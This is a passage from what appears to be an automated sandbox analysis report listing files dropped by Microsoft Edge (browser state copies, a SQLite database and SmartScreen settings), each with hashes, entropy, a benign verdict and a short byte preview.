                                                                                                                                                                                                                                                                                                        SHA-512:1011B8D60922B8D87A93284803F1ED8D7B898CA55976E3D12B55C6633FBE22B4103CC16DADA99C81B58A235107DF7C310FC2CF2B5CF9D0108ABE030DC2691E9A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF48ae7.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.08983633118473
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWjdi1zNtPM8kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNXkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:DC1D934C1906D196754BA8C1310935B9
                                                                                                                                                                                                                                                                                                        SHA1:E8AA09E10D511EB6414BA6A471E4BF46B9BE88B3
                                                                                                                                                                                                                                                                                                        SHA-256:18114B0A45CCB2E3501BEC4CC5B8E733215B1CE8D8E1CAFDF07DAF4E2728C671
                                                                                                                                                                                                                                                                                                        SHA-512:1011B8D60922B8D87A93284803F1ED8D7B898CA55976E3D12B55C6633FBE22B4103CC16DADA99C81B58A235107DF7C310FC2CF2B5CF9D0108ABE030DC2691E9A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4b1b8.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.08983633118473
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWjdi1zNtPM8kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNXkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:DC1D934C1906D196754BA8C1310935B9
                                                                                                                                                                                                                                                                                                        SHA1:E8AA09E10D511EB6414BA6A471E4BF46B9BE88B3
                                                                                                                                                                                                                                                                                                        SHA-256:18114B0A45CCB2E3501BEC4CC5B8E733215B1CE8D8E1CAFDF07DAF4E2728C671
                                                                                                                                                                                                                                                                                                        SHA-512:1011B8D60922B8D87A93284803F1ED8D7B898CA55976E3D12B55C6633FBE22B4103CC16DADA99C81B58A235107DF7C310FC2CF2B5CF9D0108ABE030DC2691E9A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4ed89.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.08983633118473
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWjdi1zNtPM8kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNXkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:DC1D934C1906D196754BA8C1310935B9
                                                                                                                                                                                                                                                                                                        SHA1:E8AA09E10D511EB6414BA6A471E4BF46B9BE88B3
                                                                                                                                                                                                                                                                                                        SHA-256:18114B0A45CCB2E3501BEC4CC5B8E733215B1CE8D8E1CAFDF07DAF4E2728C671
                                                                                                                                                                                                                                                                                                        SHA-512:1011B8D60922B8D87A93284803F1ED8D7B898CA55976E3D12B55C6633FBE22B4103CC16DADA99C81B58A235107DF7C310FC2CF2B5CF9D0108ABE030DC2691E9A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                        MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                        SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                        SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                        SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):47
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                        MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                        SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                        SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                        SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):35
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                        MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                        SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                        SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                        SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):81
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                        MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                        SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                        SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                        SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):130439
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                        MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                        SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                        SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                        SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                        MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                        SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                        SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                        SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):57
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                        MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                        SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                        SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                        SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):29
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                        MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                        SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                        SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                        SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):575056
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                        SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                        MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                        SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                        SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                        SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):460992
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                        SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                        MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                        SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                        SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                        SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
